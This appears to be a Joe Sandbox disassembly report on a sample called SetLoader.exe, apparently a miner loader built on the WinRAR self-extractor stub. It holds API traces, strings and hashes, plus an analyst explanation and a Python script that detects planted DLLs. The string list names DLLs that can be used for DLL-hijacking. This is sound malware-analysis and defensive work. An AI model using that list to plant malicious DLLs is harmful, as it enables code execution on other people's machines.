                                              • Opcode ID: 0d717ac21b4eb6e805870e8a51fdb64e58571f05d793b1f06679917b34d5a437
                                              • Instruction ID: 6530d6b0952b9b2856736c8acce7108e66b9d0e4843921519288a18d59e1bd5d
                                              • Opcode Fuzzy Hash: 0d717ac21b4eb6e805870e8a51fdb64e58571f05d793b1f06679917b34d5a437
                                              • Instruction Fuzzy Hash: 0E42D771940B64BEEB21AB60EC4AFFE37ABAB01701F045029F545AB2D1CB754A84CF65

                                              Control-flow Graph

                                              APIs
                                                • Part of subcall function 0062290A: GetModuleHandleW.KERNEL32 ref: 00622937
                                                • Part of subcall function 0062290A: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00622949
                                                • Part of subcall function 0062290A: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00622973
                                                • Part of subcall function 0062C5DD: GetCurrentDirectoryW.KERNEL32(?,?), ref: 0062C5E5
                                                • Part of subcall function 0062CCD9: OleInitialize.OLE32(00000000), ref: 0062CCF2
                                                • Part of subcall function 0062CCD9: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0062CD29
                                                • Part of subcall function 0062CCD9: SHGetMalloc.SHELL32(0065C460), ref: 0062CD33
                                              • GetCommandLineW.KERNEL32 ref: 006303C9
                                              • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 006303F3
                                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007402), ref: 00630404
                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 00630455
                                                • Part of subcall function 0062FFDD: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0062FFFE
                                                • Part of subcall function 0062FFDD: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00630038
                                                • Part of subcall function 00621421: _wcslen.LIBCMT ref: 00621445
                                              • CloseHandle.KERNEL32(00000000), ref: 0063045C
                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\SetLoader.exe,00000800), ref: 00630476
                                              • SetEnvironmentVariableW.KERNEL32(sfxname,C:\Users\user\Desktop\SetLoader.exe), ref: 00630482
                                              • GetLocalTime.KERNEL32(?), ref: 0063048D
                                              • _swprintf.LIBCMT ref: 006304E1
                                              • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 006304F6
                                              • GetModuleHandleW.KERNEL32(00000000), ref: 006304FD
                                              • LoadIconW.USER32(00000000,00000064), ref: 00630514
                                              • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001DAE0,00000000), ref: 00630565
                                              • Sleep.KERNEL32(?), ref: 00630593
                                              • CloseHandle.KERNEL32 ref: 0063061F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: EnvironmentFileHandleVariable$Module$AddressCloseProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf_wcslen
                                              • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop\SetLoader.exe$STARTDLG$pPe$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                              • API String ID: 4208810040-3514407146
                                              • Opcode ID: 9cb00f6c7a04e9db9eb1a528c25889987506f0daa3c141ae677e595e45bcf7e8
                                              • Instruction ID: e5c76a98eebac3141b67eec1576511f4281d9f16c2150e388ad6a50243eac776
                                              • Opcode Fuzzy Hash: 9cb00f6c7a04e9db9eb1a528c25889987506f0daa3c141ae677e595e45bcf7e8
                                              • Instruction Fuzzy Hash: CB712870504360AFE361AF74EC1AFAB7BDBAB46701F00541DF54593292DF358988CBA6
                                              APIs
                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800,5CB4B331), ref: 0061F9CD
                                                • Part of subcall function 0061E208: _wcslen.LIBCMT ref: 0061E210
                                                • Part of subcall function 00622663: _wcslen.LIBCMT ref: 00622669
                                                • Part of subcall function 00623D10: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,5CB4B331,?,?,5CB4B331,00000001,0061DA04,00000000,5CB4B331,?,00010418,?,?), ref: 00623D2C
                                              • _wcslen.LIBCMT ref: 0061FD00
                                              • __fprintf_l.LIBCMT ref: 0061FE50
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: _wcslen$ByteCharFileModuleMultiNameWide__fprintf_l
                                              • String ID: ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS
                                              • API String ID: 2646189078-2291855099
                                              • Opcode ID: 3bb537dad536dc999d26b6de76973fe5ff91f3fd64874ca61019ddf2100816b8
                                              • Instruction ID: e4d6941ca5ef5fea253eda9cfabc1ba64aebc96c24bbe7b67d87a34a0ccc018c
                                              • Opcode Fuzzy Hash: 3bb537dad536dc999d26b6de76973fe5ff91f3fd64874ca61019ddf2100816b8
                                              • Instruction Fuzzy Hash: A34204B1900659ABDF24DFA4D841BEE77B6FF18700F04452EF905AB281EB719A81CB94

                                              Control-flow Graph (rendered graph not reproduced; basic blocks 62c652-62c771)
                                              APIs
                                              • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0062DA3D,00000066), ref: 0062C665
                                              • SizeofResource.KERNEL32(00000000,?,?,?,0062DA3D,00000066), ref: 0062C67C
                                              • LoadResource.KERNEL32(00000000,?,?,?,0062DA3D,00000066), ref: 0062C693
                                              • LockResource.KERNEL32(00000000,?,?,?,0062DA3D,00000066), ref: 0062C6A2
                                              • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0062DA3D,00000066), ref: 0062C6BD
                                              • GlobalLock.KERNEL32(00000000,?,?,?,?,?,0062DA3D,00000066), ref: 0062C6CE
                                              • GlobalUnlock.KERNEL32(00000000), ref: 0062C756
                                                • Part of subcall function 0062C5B6: GdipAlloc.GDIPLUS(00000010), ref: 0062C5BC
                                              • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0062C737
                                              • GlobalFree.KERNEL32(00000000), ref: 0062C75D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
                                              • String ID: FjuKc$PNG
                                              • API String ID: 541704414-2951311883
                                              • Opcode ID: c6e8fbbd26fabad9a84f3e6f033177b59b645330560c1fedc83200bae90199da
                                              • Instruction ID: 10e4c5b9bc29a56cf28ec67c4f96e2285dd643863f9e271998db8b9cde645436
                                              • Opcode Fuzzy Hash: c6e8fbbd26fabad9a84f3e6f033177b59b645330560c1fedc83200bae90199da
                                              • Instruction Fuzzy Hash: EE319175200B12AFD7109F25EC88D5BBFAAEF47B61B141528F90693261EB31DC44CFA1

                                              Control-flow Graph (rendered graph not reproduced; basic blocks 61c4a8-61c62c)
                                              APIs
                                              • FindFirstFileW.KERNELBASE(?,?,00000000,?,?,?,0061C39F,000000FF,?,?,?,?,006187BC,?,?,00000000), ref: 0061C4E6
                                                • Part of subcall function 0061DA1E: _wcslen.LIBCMT ref: 0061DA59
                                              • FindFirstFileW.KERNEL32(?,00000000,?,?,00000800,?,?,0061C39F,000000FF,?,?,?,?,006187BC,?,?), ref: 0061C516
                                              • GetLastError.KERNEL32(?,?,00000800,?,?,0061C39F,000000FF,?,?,?,?,006187BC,?,?,00000000,0000003A), ref: 0061C522
                                              • FindNextFileW.KERNEL32(?,?,00000000,?,?,?,0061C39F,000000FF,?,?,?,?,006187BC,?,?,00000000), ref: 0061C549
                                              • GetLastError.KERNEL32(?,?,0061C39F,000000FF,?,?,?,?,006187BC,?,?,00000000,0000003A,?,0000003A,00000802), ref: 0061C555
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                              • String ID:
                                              • API String ID: 42610566-0
                                              • Opcode ID: b5bc1378c6d9f70a6c68085a493732d5c085650136579bb8b0f842051be34415
                                              • Instruction ID: 44368aff0782752754946b4900e9cbbc9a5cb7f0a2b79c62a8a6a98bc963af6e
                                              • Opcode Fuzzy Hash: b5bc1378c6d9f70a6c68085a493732d5c085650136579bb8b0f842051be34415
                                              • Instruction Fuzzy Hash: E24184B2508741AFC724DF24D8809EEF3EABB49750F04091DF599D3240D734A994CB96

                                              Control-flow Graph (rendered graph not reproduced; basic blocks 62cebf-62cf86)
                                              APIs
                                                • Part of subcall function 0062D392: GetCurrentProcess.KERNEL32(00020008,?), ref: 0062D3A1
                                                • Part of subcall function 0062D392: OpenProcessToken.ADVAPI32(00000000), ref: 0062D3A8
                                                • Part of subcall function 0062D392: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,?), ref: 0062D3C2
                                                • Part of subcall function 0062D392: GetLastError.KERNEL32 ref: 0062D3CC
                                                • Part of subcall function 0062D392: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,?,?), ref: 0062D3F0
                                                • Part of subcall function 0062D392: CopySid.ADVAPI32(00000044,?,00000000), ref: 0062D401
                                              • SetEntriesInAclW.ADVAPI32(00000001,?,00000000,?), ref: 0062CF20
                                              • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 0062CF2F
                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0062CF42
                                              • CreateDirectoryW.KERNELBASE(?,?), ref: 0062CF61
                                              • LocalFree.KERNEL32(?), ref: 0062CF6F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: Token$DescriptorInformationProcessSecurity$CopyCreateCurrentDaclDirectoryEntriesErrorFreeInitializeLastLocalOpen
                                              • String ID:
                                              • API String ID: 2740647886-0
                                              • Opcode ID: 88294ae9616a684f22e94cf4e9b0ca2f83b90d9dd0f665677e709f99dcfb1267
                                              • Instruction ID: 41cb6f9ca0bbe52ff8a21f7b43b094adf2a46c106037f4d2b332520d734ac98b
                                              • Opcode Fuzzy Hash: 88294ae9616a684f22e94cf4e9b0ca2f83b90d9dd0f665677e709f99dcfb1267
                                              • Instruction Fuzzy Hash: DA21D8B1900209ABDB10DF65E9449EE7BFDFF45314F10812AB815D6210D734DA55CBA1
                                              APIs
                                              • _strlen.LIBCMT ref: 006135C3
                                                • Part of subcall function 00623D10: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,5CB4B331,?,?,5CB4B331,00000001,0061DA04,00000000,5CB4B331,?,00010418,?,?), ref: 00623D2C
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0061370D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                              • String ID: CMT
                                              • API String ID: 1610651222-2756464174
                                              • Opcode ID: abeabbf41ff5d41a4c32585f410c47bc3f4978677b4644ff22a44e69b3df373d
                                              • Instruction ID: 48a1192b6669e89903810dff45212e81ad62c63bffd3bda35bb53a251c22542e
                                              • Opcode Fuzzy Hash: abeabbf41ff5d41a4c32585f410c47bc3f4978677b4644ff22a44e69b3df373d
                                              • Instruction Fuzzy Hash: 6A620371A002A48EDB19DF74C8956EA7BF3AF15300F0C457DEC4B9B382DA759A85CB60
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: _wcslen$AttributesFile_swprintf$CurrentH_prolog3Process__aulldiv_wcsrchr
                                              • String ID: P'a$__tmp_reference_source_
                                              • API String ID: 3636405837-3533469108
                                              • Opcode ID: 419567e2893e2cebbb13e393698b19da18e850e7f56052923780ddbd1c440ad4
                                              • Instruction ID: 199fb34030a121903a012628c3fb2716faa4570d49f005f28e834d83a28388ad
                                              • Opcode Fuzzy Hash: 419567e2893e2cebbb13e393698b19da18e850e7f56052923780ddbd1c440ad4
                                              • Instruction Fuzzy Hash: 1FA21770905285AEDF25DFB4C895BEE7BB7AF05300F0C41B9E9499B282D7305AC5CBA1

                                              Control-flow Graph (rendered graph not reproduced; basic blocks 62290a-622ee3)
                                              APIs
                                              • GetModuleHandleW.KERNEL32 ref: 00622937
                                              • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00622949
                                              • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00622973
                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00622C1D
                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00622C37
                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00622C4B
                                              • ReadFile.KERNEL32(00000000,?,00007FFE,$od,00000000), ref: 00622C69
                                              • CloseHandle.KERNEL32(00000000), ref: 00622CCD
                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00622CE6
                                              • CompareStringW.KERNEL32(00000400,00001001,pod,?,DXGIDebug.dll,?,$od,?,00000000,?,00000800), ref: 00622D3A
                                              • GetFileAttributesW.KERNELBASE(?,?,$od,00000800,?,00000000,?,00000800), ref: 00622D64
                                              • GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 00622DA0
                                                • Part of subcall function 006228AB: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 006228D4
                                                • Part of subcall function 006228AB: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00621309,Crypt32.dll,00000000,00621383,00000200,?,00621366,00000000,00000000,?), ref: 006228F4
                                              • _swprintf.LIBCMT ref: 00622E12
                                              • _swprintf.LIBCMT ref: 00622E5E
                                              • AllocConsole.KERNEL32 ref: 00622E66
                                              • GetCurrentProcessId.KERNEL32 ref: 00622E70
                                              • AttachConsole.KERNEL32(00000000), ref: 00622E77
                                              • _wcslen.LIBCMT ref: 00622E8C
                                              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00622E9D
                                              • WriteConsoleW.KERNEL32(00000000), ref: 00622EA4
                                              • Sleep.KERNEL32(00002710), ref: 00622EAF
                                              • FreeConsole.KERNEL32 ref: 00622EB5
                                              • ExitProcess.KERNEL32 ref: 00622EBD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite_wcslen
                                              • String ID: $od$<$DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$RpcRtRemote.dll$SSPICLI.DLL$SetDefaultDllDirectories$SetDllDirectoryW$UXTheme.dll$WINNSI.DLL$WindowsCodecs.dll$XmlLite.dll$aclui.dll$apphelp.dll$atl.dll$browcli.dll$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$cryptbase.dll$cryptsp.dll$cryptui.dll$cscapi.dll$devrtl.dll$dfscli.dll$dhcpcsvc.dll$dhcpcsvc6.dll$dnsapi.DLL$dsrole.dll$dwmapi.dll$ieframe.dll$imageres.dll$iphlpapi.DLL$kernel32$linkinfo.dll$lpk.dll$mlang.dll$mpr.dll$msasn1.dll$netapi32.dll$netutils.dll$ntmarta.dll$ntshrui.dll$oleaccrc.dll$peerdist.dll$pod$profapi.dll$propsys.dll$psapi.dll$rasadhlp.dll$rsaenh.dll$samcli.dll$samlib.dll$secur32.dll$setupapi.dll$sfc_os.dll$shdocvw.dll$shell32.dll$slc.dll$srvcli.dll$userenv.dll$usp10.dll$uxtheme.dll$version.dll$wintrust.dll$wkscli.dll$ws2_32.dll$ws2help.dll
                                              • API String ID: 270162209-742189887
                                              • Opcode ID: 8f539e737ec7833712d5ff9708706841e22f1bce8966d9b34b656a4159211be7
                                              • Instruction ID: ae74f42a79be0181c182c2180c45353c568913fc8556ccc842f2ae590ec69ba1
                                              • Opcode Fuzzy Hash: 8f539e737ec7833712d5ff9708706841e22f1bce8966d9b34b656a4159211be7
                                              • Instruction Fuzzy Hash: 41D18CB1008795ABD771DF50E858ADFBEEBAB86704F000D1DF5899A251CBB08548CFA7
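Reading the block above (00622C69-00622EBD): the function takes its own path with GetModuleFileNameW, compares each name in the String ID list against files in that directory (CompareStringW with flags 0x1001, NORM_IGNORECASE | SORT_STRINGSORT, then GetFileAttributesW), and if one is present allocates a console, prints "Please remove %s from %s folder. It is unsecure to run %s until it is done." with WriteConsoleW, sleeps 0x2710 ms (10 s) and calls ExitProcess. That message and DLL list match the DLL-hijacking guard of the WinRAR self-extractor stub, and the GetSystemDirectoryW + LoadLibraryW subcall (loading Crypt32.dll by its full system path) together with the SetDefaultDllDirectories / SetDllDirectoryW strings are the same guard's safe-loading half; this is stub code rather than the miner payload. The Python below is an added analyst example, not code from the sample or from Joe Sandbox: it pulls the .dll names out of a String ID line copied from this block (abbreviated to a subset of the names to keep it short) and reports which of them sit beside a given executable, the same test the stub performs. The temporary folder and the planted file names are constructed for the demonstration.

```python
"""Offline equivalent of the loader's DLL-planting self-check.

Added analyst example, not code from the sample or from Joe Sandbox.
"""
import os
import tempfile
from typing import List

# String ID field copied from the report block above, abbreviated to a subset
# of the DLL names (constructed input; the list in the report is longer).
STRING_ID_LINE = (
    "• String ID: $od$<$DXGIDebug.dll$Please remove %s from %s folder. "
    "It is unsecure to run %s until it is done.$RpcRtRemote.dll$SSPICLI.DLL"
    "$SetDefaultDllDirectories$SetDllDirectoryW$UXTheme.dll$WINNSI.DLL"
    "$WindowsCodecs.dll$XmlLite.dll$apphelp.dll$crypt32.dll$cryptbase.dll"
    "$kernel32$version.dll$wintrust.dll$ws2_32.dll$ws2help.dll"
)


def dll_names_from_string_id(line: str) -> List[str]:
    """Split Joe Sandbox's '$'-joined String ID field and keep the *.dll entries.

    Non-DLL strings ("od", "<", the console message, the two export names
    and the bare module name "kernel32") are dropped.
    """
    _, _, body = line.partition("String ID:")
    return [s.strip() for s in body.split("$") if s.strip().lower().endswith(".dll")]


def planted_dlls(exe_path: str, watch: List[str]) -> List[str]:
    """Names from `watch` that exist in exe_path's folder.

    Compared case-insensitively, as the stub does with CompareStringW
    (NORM_IGNORECASE) before calling GetFileAttributesW on each candidate.
    """
    folder = os.path.dirname(os.path.abspath(exe_path))
    present = {name.lower() for name in os.listdir(folder)}
    return sorted(n for n in watch if n.lower() in present)


def demo() -> List[str]:
    """Throwaway folder with a fake SetLoader.exe and two planted DLLs (constructed)."""
    watch = dll_names_from_string_id(STRING_ID_LINE)
    with tempfile.TemporaryDirectory() as folder:
        exe = os.path.join(folder, "SetLoader.exe")
        for name in ("SetLoader.exe", "version.dll", "CRYPT32.DLL", "readme.txt"):
            open(os.path.join(folder, name), "wb").close()
        hits = planted_dlls(exe, watch)
        if hits:
            # The stub's own wording; the stub then does Sleep(0x2710) and ExitProcess.
            print("Please remove %s from %s folder. It is unsecure to run %s until it is done."
                  % (", ".join(hits), folder, os.path.basename(exe)))
        return hits


if __name__ == "__main__":
    print(demo())
```

To run the check against a real drop, call `planted_dlls(r"C:\samples\SetLoader.exe", dll_names_from_string_id(line))` with the full String ID line from the report (the path is a placeholder); a non-empty result means the folder already contains a DLL the stub would refuse to start next to, which is also the folder a hijacking payload would have to be dropped in.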

                                              Control-flow Graph

                                              APIs
                                                • Part of subcall function 0062D864: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0062D875
                                                • Part of subcall function 0062D864: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0062D886
                                                • Part of subcall function 0062D864: IsDialogMessageW.USER32(00010418,?), ref: 0062D89A
                                                • Part of subcall function 0062D864: TranslateMessage.USER32(?), ref: 0062D8A8
                                                • Part of subcall function 0062D864: DispatchMessageW.USER32(?), ref: 0062D8B2
                                              • GetDlgItem.USER32(00000068,00673CF0), ref: 0062F81F
                                              • ShowWindow.USER32(00000000,00000005,?,?,0062D099,00000001,?,?,0062DAB9,006482F0,00673CF0,00673CF0,00001000,?,00000000,?), ref: 0062F844
                                              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0062F853
                                              • SendMessageW.USER32(00000000,000000C2,00000000,006465F4), ref: 0062F861
                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0062F87B
                                              • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0062F895
                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0062F8D9
                                              • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0062F8E4
                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0062F8F7
                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0062F91E
                                              • SendMessageW.USER32(00000000,000000C2,00000000,0064769C), ref: 0062F92D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                              • String ID: \
                                              • API String ID: 3569833718-2967466578
                                              • Opcode ID: 4a5e3b1ed7d4e8077386c3a71f56dfdd51a505f7b6af730b95a667ff76439be0
                                              • Instruction ID: e24647377fe8872f22c7c3bc14320781dccad4c1c2f885bf72037c899aad0fe0
                                              • Opcode Fuzzy Hash: 4a5e3b1ed7d4e8077386c3a71f56dfdd51a505f7b6af730b95a667ff76439be0
                                              • Instruction Fuzzy Hash: 673124B1208700AFE314DF24EC0AF6B7BEEEB56714F54091DF5A19A1D1C7A449448BA6
